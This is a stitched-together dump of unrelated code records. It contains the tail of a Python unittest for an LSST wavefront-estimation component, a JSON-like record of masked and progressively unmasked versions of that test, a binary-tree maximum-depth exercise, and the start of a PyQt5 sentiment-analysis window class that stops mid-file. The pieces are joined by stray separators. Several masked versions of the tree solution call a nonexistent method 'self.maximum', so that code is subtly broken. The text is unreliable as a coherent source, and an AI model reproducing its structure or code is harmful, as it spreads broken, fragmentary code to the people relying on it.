self.wepCmpt.setSkyFile(skyFile)
self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)
def testCalculateWavefrontErrorsComCam(self):
# Make the calibration products and do the ingestion
sensorNameList = ["R22_S11", "R22_S12"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
self.wepCmpt.ingestCalibs(fakeFlatDir)
# Set the skyFile
repackagedDir = os.path.join(getModulePath(), "tests", "testData",
"comcamRepackagedData")
skyFilePath = os.path.join(repackagedDir, "skyComCamInfo.txt")
self.wepCmpt.setSkyFile(skyFilePath)
# Collect the wavefront data
intraRawExpData = RawExpData()
intraObsId = 9006002
intraRawExpDir = os.path.join(repackagedDir, "intra")
intraRawExpData.append(intraObsId, 0, intraRawExpDir)
extraRawExpData = RawExpData()
extraObsId = 9006001
extraRawExpDir = os.path.join(repackagedDir, "extra")
extraRawExpData.append(extraObsId, 0, extraRawExpDir)
# Calculate the wavefront error
wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,
extraRawExpData)
self.assertEqual(len(wfErrMap), 2)
for wfErr in wfErrMap.values():
self.assertEqual(wfErr.argmax(), 1)
if __name__ == "__main__":
# Run the unit test
unittest.main()
|
normal
|
{
"blob_id": "6e434ff213166768a6adadf99dc5d6d8611fa2ba",
"index": 2762,
"step-1": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n <mask token>\n <mask token>\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n <mask token>\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-4": "import os\nimport shutil\nimport numpy as np\nimport unittest\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n self.outputDir = os.path.join(getModulePath(), 'tests', 'tmp')\n self._makeDir(self.outputDir)\n isrDirName = 'input'\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n self.wepCmpt = WepCmpt(isrDir)\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n 
repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import os\nimport shutil\nimport numpy as np\nimport unittest\n\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\n\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n\n self.outputDir = os.path.join(getModulePath(), \"tests\", \"tmp\")\n self._makeDir(self.outputDir)\n\n isrDirName = \"input\"\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n\n self.wepCmpt = WepCmpt(isrDir)\n\n # Set the survey paramters\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n\n sensorNameList = [\"R22_S11\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n\n fakeFlatDirName = \"fake_flats\"\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n\n detector = \" \".join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n\n currWorkDir = os.getcwd()\n\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n\n command = \"makeGainImages.py\"\n argstring = \"--detector_list %s\" % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n\n return len([name for name in os.listdir(folder) \n if os.path.isfile(os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, \"\")\n\n def testSetSkyFile(self):\n\n skyFile = \"testSetSkyFile\"\n self.wepCmpt.setSkyFile(skyFile)\n\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n\n # Make the calibration products and do 
the ingestion\n sensorNameList = [\"R22_S11\", \"R22_S12\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n # Set the skyFile\n repackagedDir = os.path.join(getModulePath(), \"tests\", \"testData\",\n \"comcamRepackagedData\")\n skyFilePath = os.path.join(repackagedDir, \"skyComCamInfo.txt\")\n self.wepCmpt.setSkyFile(skyFilePath)\n\n # Collect the wavefront data\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, \"intra\")\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, \"extra\")\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n\n # Calculate the wavefront error\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == \"__main__\":\n\n # Run the unit test\n unittest.main()\n",
"step-ids": [
9,
14,
16,
22,
23
]
}
|
[
9,
14,
16,
22,
23
] |
# coding=utf-8
"""
Given a binary tree, find its maximum depth.
The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
Example
Given a binary tree as follow:
1
/ \
2 3
/ \
4 5
The maximum depth is 3.
"""
"""
Definition of TreeNode:
"""
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
class Solution:
"""
@param root: The root of binary tree.
@return: An integer
"""
def maxDepth(self, root):
# write your code here
if not root:
return 0
        return max(self.maxDepth(root.left), self.maxDepth(root.right)) + 1
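# Illustrative usage sketch (not part of the original solution): build the
# example tree from the docstring above and check the reported depth.
if __name__ == "__main__":
    root = TreeNode(1)
    root.left, root.right = TreeNode(2), TreeNode(3)
    root.right.left, root.right.right = TreeNode(4), TreeNode(5)
    print(Solution().maxDepth(root))  # expected output: 3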
|
normal
|
{
"blob_id": "262d6722f4c158d0a41b22433792cdc35651d156",
"index": 9459,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n\n def maxDepth(self, root):\n if not root:\n return 0\n return max(self.maximum(root.left), self.maximum(root.right)) + 1\n",
"step-3": "<mask token>\n\n\nclass TreeNode:\n <mask token>\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n\n def maxDepth(self, root):\n if not root:\n return 0\n return max(self.maximum(root.left), self.maximum(root.right)) + 1\n",
"step-4": "<mask token>\n\n\nclass TreeNode:\n\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n\n def maxDepth(self, root):\n if not root:\n return 0\n return max(self.maximum(root.left), self.maximum(root.right)) + 1\n",
"step-5": "# coding=utf-8\n\n\"\"\"\nGiven a binary tree, find its maximum depth.\nThe maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\n\nExample\nGiven a binary tree as follow:\n\n 1\n / \\ \n2 3\n / \\\n 4 5\nThe maximum depth is 3.\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\n\"\"\"\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\" \n def maxDepth(self, root):\n # write your code here\n if not root:\n \treturn 0\n return max(self.maximum(root.left),self.maximum(root.right))+1",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# ================================================== #
# MAIN WINDOW #
# ================================================== #
# Author: Brady Hammond #
# Created: 11/21/2017 #
# Last Edited: N/A #
# Last Edited By: N/A #
# ================================================== #
# FILE SETUP #
# ================================================== #
# Import statements
import os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QStandardItem, QStandardItemModel
from PyQt5.QtWidgets import QMessageBox
from src import FileDialog, SentimentAnalyzer
# ================================================== #
# CLASS DEFINITION #
# ================================================== #
# UIMainWindow class definition
class UIMainWindow(object):
# Define __init__ function
def __init__(self):
# Create main window
font = QtGui.QFont()
font.setFamily("Myriad Pro")
font.setPointSize(14)
self.main_window = QtWidgets.QWidget()
self.main_window.setFont(font)
self.main_window.setObjectName("main_window")
self.main_window.setWindowModality(QtCore.Qt.WindowModal)
self.main_window.resize(450, 460)
size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
size_policy.setHorizontalStretch(0)
size_policy.setVerticalStretch(0)
size_policy.setHeightForWidth(self.main_window.sizePolicy().hasHeightForWidth())
self.main_window.setSizePolicy(size_policy)
self.main_window.setMinimumSize(QtCore.QSize(450, 460))
self.main_window.setMaximumSize(QtCore.QSize(450, 460))
self.main_window.setBaseSize(QtCore.QSize(450, 460))
# Create branding icon
self.branding_icon = QtWidgets.QLabel(self.main_window)
self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))
self.branding_icon.setText("")
self.branding_icon.setPixmap(QtGui.QPixmap("../images/senticompare_logo.png"))
self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.AlignVCenter)
self.branding_icon.setObjectName("branding_icon")
# Create branding label
self.branding_label = QtWidgets.QLabel(self.main_window)
self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
self.branding_label.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Optima")
font.setPointSize(50)
self.branding_label.setFont(font)
self.branding_label.setObjectName("branding_label")
# Create first horizontal layout
self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)
self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, 430, 50))
self.horizontal_layout_widget_1.setObjectName("horizontal_layout_widget_1")
self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_1)
self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)
self.horizontal_layout_1.setObjectName("horizontal_layout_1")
# Create run button
self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)
self.run_button.setObjectName("run_button")
self.run_button.clicked.connect(self.run)
# Add run button to first horizontal layout
self.horizontal_layout_1.addWidget(self.run_button)
# Create quit button
self.quit_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)
self.quit_button.setObjectName("quit_button")
self.quit_button.clicked.connect(self.main_window.close)
# Add quit button to first horizontal layout
self.horizontal_layout_1.addWidget(self.quit_button)
# Create file selection tab
self.select_files_tab = QtWidgets.QWidget()
self.select_files_tab.setObjectName("select_files_tab")
# Create second horizontal layout
self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.select_files_tab)
self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, 230, 50))
self.horizontal_layout_widget_2.setObjectName("horizontal_layout_widget_2")
self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_2)
self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)
self.horizontal_layout_2.setObjectName("horizontal_layout_2")
# Create input/output tab window
font.setFamily("Myriad Pro")
font.setPointSize(12)
self.input_output_box = QtWidgets.QTabWidget(self.main_window)
self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))
self.input_output_box.setFont(font)
self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)
self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)
self.input_output_box.setTabsClosable(False)
self.input_output_box.setObjectName("input_output_box")
# Create file view
self.file_view = QtWidgets.QListView(self.select_files_tab)
self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))
self.file_view.setObjectName("file_view")
# Create file view model
self.file_view_model = QStandardItemModel(self.file_view)
# Add file view model to file view
self.file_view.setModel(self.file_view_model)
# Show file view
self.file_view.show()
# Add file selection tab to input/output tab window
self.input_output_box.addTab(self.select_files_tab, "")
# Create add button
self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)
self.add_button.setFont(font)
self.add_button.setObjectName("add_button")
self.add_button.clicked.connect(self.selectFiles)
# Add add button to second horizontal layout
self.horizontal_layout_2.addWidget(self.add_button)
# Create delete button
self.delete_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)
self.delete_button.setFont(font)
self.delete_button.setObjectName("delete_button")
self.delete_button.clicked.connect(self.removeFiles)
# Add delete button to second horizontal layout
self.horizontal_layout_2.addWidget(self.delete_button)
# Create manual input tab
self.manual_input_tab = QtWidgets.QWidget()
self.manual_input_tab.setObjectName("manual_input_tab")
# Create text input
self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)
self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))
self.text_input.setObjectName("text_input")
# Add text input to manual input tab
self.input_output_box.addTab(self.manual_input_tab, "")
# Create results tab
